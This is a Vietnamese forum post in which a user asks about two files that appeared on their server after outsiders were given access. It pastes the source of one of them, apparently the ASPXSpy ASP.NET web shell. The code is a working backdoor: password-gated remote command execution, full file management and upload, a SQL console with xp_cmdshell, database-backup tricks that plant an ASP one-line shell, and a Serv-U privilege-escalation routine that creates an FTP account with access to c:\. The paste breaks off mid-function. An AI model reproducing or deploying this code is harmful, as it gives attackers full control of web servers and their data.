Hỏi về: Mình có làm server localhost sau khi cho người ngoài truy cập vào thì xuất hiện 2

fanmu

W-------
16/04/2016
0
2 bài viết
Hỏi về: Mình có làm server localhost sau khi cho người ngoài truy cập vào thì xuất hiện 2
FIle1












/*
Thanks Snailsor,FuYu,BloodSword

Code by Bin

Make in China

Blog: http://www.rootkit.net.cn

E-mail : [email protected]
*/
public string Password="21232f297a57a5a743894a0e4a801fc3";
public string SessionName="ASPXSpy";
public string cookiePass="ASPXSpyCookiePass";
public string Bin_Action="";
public string Bin_Request="";
protected OleDbConnection conn=new OleDbConnection();
protected OleDbCommand comm=new OleDbCommand();

protected void Page_Load(object sender, EventArgs e)
{
//string strkey;
bool isCookied=false;
HttpCookieCollection cookiecoll=Request.Cookies;
foreach (string strkey in cookiecoll.AllKeys)
{
if (strkey==cookiePass)
{
if (cookiecoll[strkey].Value==Password)
{
isCookied=true;
}
break;
}
}
if((Session[SessionName] !="BIN")&&(!isCookied))
{
Bin_login();
}
else
{
if(!IsPostBack)
{
Bin_main();
}
else
{

Bin_Action=Request["goaction"];
if(Bin_Action=="del")
{
Bin_Request=Request["todo"];
Bin_Filedel(Bin_Request, 1);
}
if(Bin_Action=="change")
{
Bin_Request=Request["todo"];
Bin_FileList(Bin_Request);
}
if(Bin_Action=="deldir")
{
Bin_Request=Request["todo"];
Bin_Filedel(Bin_Request, 2);
}
if(Bin_Action=="down")
{
Bin_Request=Request["todo"];
Bin_Filedown(Bin_Request);
}
if(Bin_Action=="rename")
{
Bin_Request=Request["todo"];
Bin_FileRN(Bin_Request, 1);
}
if(Bin_Action=="renamedir")
{
Bin_Request=Request["todo"];
Bin_FileRN(Bin_Request, 2);
}
if(Bin_Action=="showatt")
{
Bin_Request=Request["todo"];
Bin_Fileatt(Bin_Request);
}
if(Bin_Action=="edit")
{
Bin_Request=Request["todo"];
Bin_FileEdit(Bin_Request);
}
if(Bin_Action=="postdata")
{

Bin_Request=Request["todo"];
Session["Bin_Table"]=Bin_Request;
Bin_DataGrid.CurrentPageIndex=0;
Bin_DBstrTextBox.Text="";
Bin_Databind();
}
if(Bin_Action=="changedata")
{
Session["Bin_Table"]=null;
Bin_Request=Request["todo"];
Session["Bin_Option"]=Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible=false;
Bin_DBstrTextBox.Text=Bin_Request;

}
if(Session["Bin_Table"] !=null)
{
Bin_Databind();
}

}
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible=true;
Bin_MainPanel.Visible=false;
Bin_MenuPanel.Visible=false;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
}
public void Bin_main()
{
TimeLabel.Text=DateTime.Now.ToString();
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_LoginPanel.Visible=false;
Bin_MainPanel.Visible=true;
Bin_MenuPanel.Visible=true;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
string ServerIP="Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"
";
string HostName="HostName : "+Environment.MachineName+"
";
string OS="OS Version : "+Environment.OSVersion+"";
string IISversion="IIS Version : "+Request.ServerVariables["SERVER_SOFTWARE"]+"
";
string PATH_INFO="PATH_TRANSLATED : "+Request.ServerVariables["PATH_TRANSLATED"]+"
";
InfoLabel.Text="SYS-INFO";
InfoLabel.Text+=ServerIP+HostName+OS+IISversion+PATH_INFO+"";
InfoLabel.Text+=Bin_Process()+"";

}
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg=new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");

if(reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo="";
string iisstart="";
string iisend="";
string iisstr="IIS://localhost/W3SVC";
int i=0;
try
{
DirectoryEntry mydir=new DirectoryEntry(iisstr);
iisstart="OrderIIS_USERDomainPath";
foreach(DirectoryEntry child in mydir.Children)
{
if(CheckIsNumber(child.Name.ToString()))
{
string dirstr=child.Name.ToString();
string tmpstr="";
DirectoryEntry newdir=new DirectoryEntry(iisstr+"/"+dirstr);
DirectoryEntry newdir1=newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo+=""+(i=i+1)+"";
iisinfo+=""+newdir1.Properties["AnonymousUserName"].Value+"";
iisinfo+=""+child.Properties["ServerBindings"][0]+"";
iisinfo+=""+newdir1.Properties["Path"].Value+"";
iisinfo+="";
}
}
iisend="";
}
catch(Exception error)
{
Bin_Error(error.Message);
}
return iisstart+iisinfo+iisend;
}
public string Bin_Process()
{
string htmlstr="PROCESS-INFOIDProcessMemorySizeThreads";
string prostr="";
string htmlend="";
try
{
Process[] myprocess=Process.GetProcesses();
foreach(Process p in myprocess)
{
prostr+=""+p.Id.ToString()+"";
prostr+=""+p.ProcessName.ToString()+"";
prostr+=""+p.WorkingSet.ToString()+"";
prostr+=""+p.Threads.Count.ToString()+"";
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr+prostr+htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass=FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if(MD5Pass==Password)
{
Session[SessionName]="BIN";
Response.Cookies.Add(new HttpCookie(cookiePass,Password));
Bin_main();
}
else
{
Bin_login();
}
}

protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Response.Cookies.Add(new HttpCookie(cookiePass,null));
Bin_login();
}

protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_MainPanel.Visible=false;
Bin_FilePanel.Visible=true;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_upTextBox.Text=formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text=formatpath(Server.MapPath("."));
Bin_upTextBox.Text=formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath("."));

}

protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file="";
file+="Drives : ";
string[] drivers=Directory.GetLogicalDrives();
for(int i=0; i < drivers.Length; i++)
{
file+=""+drivers+" ";
}
file+=" WebRoot : "+Server.MapPath(".")+"";
Bin_FileLabel.Text=file;
}

public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible=true;
Bin_CreateTextBox.Text="";
Bin_CopytoTextBox.Text="";
Bin_CopyTextBox.Text=Bin_path;
Bin_upTextBox.Text=Bin_path;
Bin_IISPanel.Visible=false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist=Bin_FilelistLabel.Text;
Bin_Filelist="";
Bin_Filelist+="";
Bin_Filelist+="NameSize(Byte)";
Bin_Filelist+="ModifyTimeOperate";
try
{
Bin_Filelist+="";
string parstr="";
if(Bin_path.Length < 4)
{
parstr=formatpath(Bin_path);

}
else
{
parstr= formatpath(Directory.GetParent(Bin_path).ToString());

}
Bin_Filelist+="|Parent Directory|";
Bin_Filelist+="";

DirectoryInfo Bin_dir=new DirectoryInfo(Bin_path);
foreach(DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername=formatpath(Bin_path)+"/"+formatfile(Bin_folder.Name);
tmpstr+="";
tmpstr+=""+Bin_folder.Name+"<dir>"+Directory.GetLastWriteTime(Bin_path+"/"+Bin_folder.Name)+"Ren|Att|Del";
tmpstr+="";
}
foreach(FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename=formatpath(Bin_path)+"/"+formatfile(Bin_file.Name);
tmpstr+="";
tmpstr+=""+Bin_file.Name+""+Bin_file.Length+""+Directory.GetLastWriteTime(Bin_path+"/"+Bin_file.Name)+"Edit|Ren|Down|Att|Del";
tmpstr+="";
}
tmpstr+="";
}
catch(Exception Error)
{
Bin_Error(Error.Message);

}

Bin_FilelistLabel.Text=Bin_Filelist+tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if(type==1)
{
File.Delete(instr);
}
if(type==2)
{
foreach(string tmp in Directory.GetFileSystemEntries(instr))
{
if(File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, 2);
}
}
Directory.Delete(instr);
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if(type==1)
{
string[] array=instr.Split(',');

File.Move(array[0], array[1]);
}
if(type==2)
{
string[] array=instr.Split(',');
Directory.Move(array[0], array[1]);
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream=new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize=MyFileStream.Length;
byte[] Buffer=new byte[(int)FileSize];
MyFileStream.Read(Buffer, 0,(int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename="+instr);
Response.Charset="UTF-8";
Response.ContentType="application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}

}
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible=true;
Bin_FilePanel.Visible=true;
try
{
string Att=File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked=false;
Bin_SystemCheckBox.Checked=false;
Bin_HiddenCheckBox.Checked=false;
Bin_ArchiveCheckBox.Checked=false;

if(Att.LastIndexOf("ReadOnly")!=-1)
{
Bin_ReadOnlyCheckBox.Checked=true;
}
if(Att.LastIndexOf("System")!=-1)
{
Bin_SystemCheckBox.Checked=true;
}
if(Att.LastIndexOf("Hidden")!=-1)
{
Bin_HiddenCheckBox.Checked=true;
}
if(Att.LastIndexOf("Archive")!=-1)
{
Bin_ArchiveCheckBox.Checked=true;
}
Bin_CreationTimeTextBox.Text=File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text=File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text=File.GetLastAccessTime(instr).ToString();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text=instr;
Session["FileName"]=instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible=true;
Bin_EditPanel.Visible=true;
Bin_DriveList();
Bin_EditpathTextBox.Text=instr;
StreamReader SR=new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text=SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{

string uppath=Bin_upTextBox.Text;
if(uppath.Substring(uppath.Length - 1, 1)!=@"/")
{
uppath=uppath+@"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath+Path.GetFileName(Bin_UpFile.Value));

}
catch(Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text="Error : "+error;
}
public string formatpath(string instr)
{
instr=instr.Replace(@"", "/");
if(instr.Length < 4)
{
instr=instr.Replace(@"/", "");
}
if(instr.Length==2)
{
instr=instr+@"/";
}
instr=instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr=instr.Replace(" ", "%20");
return instr;

}
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile=Bin_CreateTextBox.Text;
string filepath=Bin_upTextBox.Text;
filepath=filepath+"/"+newfile;
try
{
StreamWriter sw=new StreamWriter(filepath, true, Encoding.Default);

}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath=Bin_upTextBox.Text;
string newdir=Bin_CreateTextBox.Text;
newdir=dirpath+"/"+newdir;
try
{
Directory.CreateDirectory(newdir);

}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr=Bin_CopyTextBox.Text;
string copyto=Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text="";
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr=Bin_CopyTextBox.Text;
string copyto=Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text="";
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName=Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if(Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
}

if(Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.System);
}
if(Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.Hidden);
}
if(Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName)| FileAttributes.Archive);
}
if(FileName.Substring(FileName.Length - 1, 1)=="/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("alert('Success!')");
}

protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW=new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("alert('Success!')");

}

protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}

protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=true;
Bin_SQLPanel.Visible=false;
Bin_CmdLabel.Text="";
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
}

protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro=new Process();
Cmdpro.StartInfo.FileName=Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments=Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute=false;
Cmdpro.StartInfo.RedirectStandardInput=true;
Cmdpro.StartInfo.RedirectStandardOutput=true;
Cmdpro.StartInfo.RedirectStandardError=true;
Cmdpro.Start();
string cmdstr=Cmdpro.StandardOutput.ReadToEnd();
cmdstr=cmdstr.Replace("", ">");
Bin_CmdLabel.Text=""+cmdstr+"

";
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}

protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_Scroll.Visible=false;
Bin_DBmenuPanel.Visible=false;
Bin_dirPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_RegPanel.Visible=false;
}

protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"]=null;
Bin_SQLconnTextBox.Text="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked=true;
Bin_AccRadioButton.Checked=false;
Bin_AccPanel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_DBmenuPanel.Visible=false;
Bin_dirPanel.Visible=false;
}

protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"]=null;
Bin_SQLconnTextBox.Text=@"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked=false;
Bin_AccRadioButton.Checked=true;
Bin_DBmenuPanel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_dirPanel.Visible=false;

}
protected void OpenConnection()
{
if(conn.State==ConnectionState.Closed)
{
try
{
conn.ConnectionString=Bin_SQLconnTextBox.Text;
comm.Connection=conn;
conn.Open();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if(conn.State==ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da=new OleDbDataAdapter();
DataTable datatable=new DataTable();
try
{
OpenConnection();
comm.CommandType=CommandType.Text;
comm.CommandText=sqlstr;
da.SelectCommand=comm;
da.Fill(datatable);
}
catch(Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"]=null;
Bin_DataGrid.CurrentPageIndex=0;
Bin_DataGrid.AllowPaging=true;
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
Bin_DBinfoLabel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_Scroll.Visible=false;
Bin_dirPanel.Visible=false;
OpenConnection();
DataTable ver=Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs=Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb=Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol=Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner=Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo="";
if(owner.Rows[0][0].ToString()=="1")
{
dbo="db_owner";
}
else
{
dbo="public";
}
if(rol.Rows[0][0].ToString()=="1")
{
dbo="sa";
}
string db_info="";
db_info="SQLversion : "+ver.Rows[0][0].ToString()+"
";
string db_name="";
for(int i=0; i < dbs.Rows.Count; i++)
{
db_name+=dbs.Rows[0].ToString().Replace(cdb.Rows[0][0].ToString(), ""+cdb.Rows[0][0].ToString()+"")+" | ";
}
db_info+="DataBase : "+db_name+"
";
db_info+="SRVROLEMEMBER : "+dbo+"";
Bin_DBinfoLabel.Text=db_info;
}
if(Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible=false;
Bin_SAexecButton.Visible=false;
Bin_Accbind();
}
}
catch(Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible=false;
Bin_AccPanel.Visible=true;
OpenConnection();
DataTable acctable=new DataTable();
acctable=conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr="";
accstr+="Tables Count : "+acctable.Rows.Count+"
Please select a database : ";
for(int i=0; i < acctable.Rows.Count; i++)
{
accstr+=""+acctable.Rows.ItemArray[2].ToString()+"";
}
if(Session["Bin_Table"] !=null)
{
accstr+=""+Session["Bin_Table"]+"";
}
accstr+="";
Bin_AccinfoLabel.Text=accstr;
CloseConnection();
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible=false;
Bin_Accbind();
Bin_Scroll.Visible=true;
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
Bin_DBinfoLabel.Visible=false;
}
Bin_DataGrid.Visible=true;
DataTable databind=Bin_DataTable(@"SELECT * FROM "+Session["Bin_Table"]);
Bin_DataGrid.DataSource=databind;
Bin_DataGrid.DataBind();
}
catch(Exception Error)
{

Bin_Error(Error.Message);
}
}

public void Bin_ExecSql(string instr)
{
try
{
OpenConnection();
comm.CommandType=CommandType.Text;
comm.CommandText=instr;
comm.ExecuteNonQuery();
}
catch(Exception e)
{
Bin_Error(e.Message);
}
}
public void Item_DataBound(object sender,DataGridItemEventArgs e)
{

for(int i=2; i < e.Item.Cells.Count; i++)
{
e.Item.Cells.Text=e.Item.Cells.Text.Replace("", ">");
}

}
protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e)
{
Bin_DataGrid.CurrentPageIndex=e.NewPageIndex;
Bin_Databind();
}
public void Item_Command(object sender, DataGridCommandEventArgs e)
{
if(e.CommandName=="Cancel")
{
Bin_DataGrid.EditItemIndex=-1;
Bin_Databind();
}
}

protected void Bin_ExecButton_Click(object sender, EventArgs e)
{
try
{

Bin_Scroll.Visible=true;
Bin_DataGrid.Visible=true;
Bin_DataGrid.AllowPaging=true;
Bin_Accbind();
if(Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible=true;
}
string sqlstr=Bin_DBstrTextBox.Text;
sqlstr=sqlstr.TrimStart().ToLower();
if(sqlstr.Substring(0, 6)=="select")
{
DataTable databind=Bin_DataTable(sqlstr);
Bin_DataGrid.DataSource=databind;
Bin_DataGrid.DataBind();
}
else
{
Bin_ExecSql(sqlstr);
Bin_Databind();
}
}
catch(Exception error)
{
Bin_Error(error.Message);
}
}

protected void Bin_BDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_Accbind();
Bin_DBmenuPanel.Visible=true;
Bin_DataGrid.Visible=false;
Bin_DataGrid.AllowPaging=true;
Bin_Scroll.Visible=false;
Bin_DBstrTextBox.Text="";
Bin_SAexecButton.Visible=false;
Bin_ResLabel.Visible=false;
Bin_dirPanel.Visible=false;

}

protected void Bin_SACMDButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
Bin_SAexecButton.Visible=true;
Bin_Change();
Bin_ExecButton.Visible=false;
Bin_ResLabel.Visible=false;
Session["Bin_Option"]=null;
Bin_dirPanel.Visible=false;

}
public void Bin_Change()
{
Bin_ExecButton.Visible=false;
string select="SQL Server ExecAdd sp_oacreateAdd xp_cmdshellAdd xp_cmdshellAdd xp_cmdshell(SQL2005)XP_cmdshell execSP_oamethod execSP_makewebtask make file";
if(Session["Bin_Option"] !=null)
{
select+=""+Session["Bin_Option"]+"";
}
select+="";
Bin_AccinfoLabel.Text=select;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
}

protected void Bin_SAexecButton_Click(object sender, EventArgs e)
{
try
{
Bin_Change();
Bin_DBinfoLabel.Visible=false;
Bin_ExecButton.Visible=false;
Bin_Scroll.Visible=false;
Bin_DataGrid.Visible=false;
Bin_DBmenuPanel.Visible=true;
string sqlstr=Bin_DBstrTextBox.Text;
DataTable databind=Bin_DataTable(sqlstr);
string res="";
foreach(DataRow dr in databind.Rows)
{
for(int i=0; i < databind.Columns.Count; i++)
{
res+=dr+"\r";
}
}
Bin_ResLabel.Text="
Mã:
"+res.Replace(" ", " ").Replace("", ">")+"

";


}
catch(Exception error)
{
Bin_Error(error.Message);
}

}

protected void Bin_DirButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_DBinfoLabel.Visible=false;
Bin_DataGrid.Visible=false;
Bin_Scroll.Visible=false;
}

protected void Bin_listButton_Click(object sender, EventArgs e)
{
Bin_dirPanel.Visible=true;
Bin_AccPanel.Visible=false;
Bin_DBinfoLabel.Visible=false;
Bin_SqlDir();
}
public void Bin_SqlDir()
{
try
{
Bin_DataGrid.Visible=true;
Bin_Scroll.Visible=true;
Bin_DataGrid.AllowPaging=false;
string exesql="use pubs;if exists(select * from sysobjects where id=object_id(N'[bin_dir]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400))INSERT bin_dir EXEC MASTER..XP_dirtree '"+Bin_DirTextBox.Text+"',1,1;";
Bin_ExecSql(exesql);
DataTable sql_dir=Bin_DataTable("select * from bin_dir");
Bin_DataGrid.DataSource=sql_dir;
Bin_DataGrid.DataBind();
}
catch(Exception e)
{
Bin_Error(e.Message);
}
}

protected void Bin_SuButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=true;
Bin_IISPanel.Visible=false;
Bin_SuresLabel.Text="";
Bin_LoginPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
}

protected void Bin_dbshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_BakDB();
}
public void Bin_BakDB()
{
string path=Bin_DirTextBox.Text.Trim();
if(path.Substring(path.Length - 1, 1)==@"")
{
path=path+"bin.asp";
}
else
{
path=path+@"\bin.asp";
}
string sql="if exists(select * from sysobjects where id=object_id(N'[bin_cmd]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_cmd];create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='"+path+"' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}
public void Bin_BakLog()
{
string path=Bin_DirTextBox.Text.Trim();
if(path.Substring(path.Length - 1, 1)==@"")
{
path=path+"bin.asp";
}
else
{
path=path+@"\bin.asp";
}
string sql="if exists(select * from sysobjects where id=object_id(N'[bin_cmd]')and OBJECTPROPERTY(id, N'IsUserTable')=1)drop table [bin_cmd];create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='"+path+"' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];";
Bin_ExecSql(sql);
Bin_SqlDir();
}

protected void Bin_LogshellButton_Click(object sender, EventArgs e)
{
Bin_DBinfoLabel.Visible=false;
Bin_AccPanel.Visible=false;
Bin_BakLog();
}

protected void Bin_SuexpButton_Click(object sender, EventArgs e)
{
string Result="";
string user=Bin_SunameTextBox.Text;
string pass=Bin_SupassTextBox.Text;
int port=Int32.Parse(Bin_SuportTextBox.Text);
string cmd=Bin_SucmdTextBox.Text;
string loginuser="user "+user+"\r\n";
string loginpass="pass "+pass+"\r\n";
string site="SITE MAINTENANCE\r\n";
string deldomain="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";
string setdomain="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";
string newdomain="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";
string quite="QUIT\r\n";
try
{
TcpClient tcp=new TcpClient("127.0.0.1", port);
tcp.ReceiveBufferSize=1024;
NetworkStream NS=tcp.GetStream();
Result=Rev(NS);
Result+=Send(NS, loginuser);
Result+=Rev(NS);
Result+=Send(NS, loginpass);
Result+=Rev(NS);
Result+=Send(NS, site);
Result+=Rev(NS);
Result+=Send(NS, deldomain);
Result+=Rev(NS);
Result+=Send(NS, setdomain);
Result+=Rev(NS);
Result+=Send(NS, newdomain);
Result+=Rev(NS);
TcpClient tcp1=new TcpClient("127.0.0.1", 52521);
NetworkStream NS1=tcp1.GetStream();
Result+=Rev(NS1);
Result+=Send(NS1, "user bin\r\n");
Result+=Rev(NS1);
Result+=Send(NS1, "pass binftp\r\n");
